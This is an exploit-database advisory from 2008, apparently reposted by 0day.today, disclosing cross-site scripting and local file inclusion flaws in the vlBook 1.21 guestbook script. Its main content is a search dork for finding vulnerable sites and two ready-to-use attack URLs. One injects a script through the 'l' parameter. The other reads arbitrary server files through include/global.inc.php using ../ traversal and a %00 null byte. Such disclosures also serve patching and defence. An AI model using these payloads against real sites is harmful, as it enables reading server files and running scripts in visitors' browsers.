id: 2945
date: 04/30/2008
title: vlBook 1.21 (XSS/LFI) Multiple Remote Vulnerabilities
author: IRCRASH
cves: 

=====================================================
vlBook 1.21 (XSS/LFI) Multiple Remote Vulnerabilities
=====================================================



#####################################################################################
####                    vlBook 1.21 (ALL VERSION)                                ####
####             Multiple Remote Vulnerabilities (LFI/XSS)                       ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani)                                 #
#Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)                          #
#IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de   #
#####################################################################################
#                                                                                   #
#Script Download : http://home.vlab.info/vlbook_1.21.zip                            #
#                                                                                   #
#DORK : "Powered by  vlBook 1.21"                                                   #
#                                                                                   #
#####################################################################################
#                                   < XSS >                                         #
#XSS Address : http://example/?l=" <script>alert('xss')</script>                    #
#                                                                                   #
#####################################################################################
#                                   < LFI >                                         #
#LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00      #
#                                                                                   #
#####################################################################################




#  0day.today [2023-03-27]  #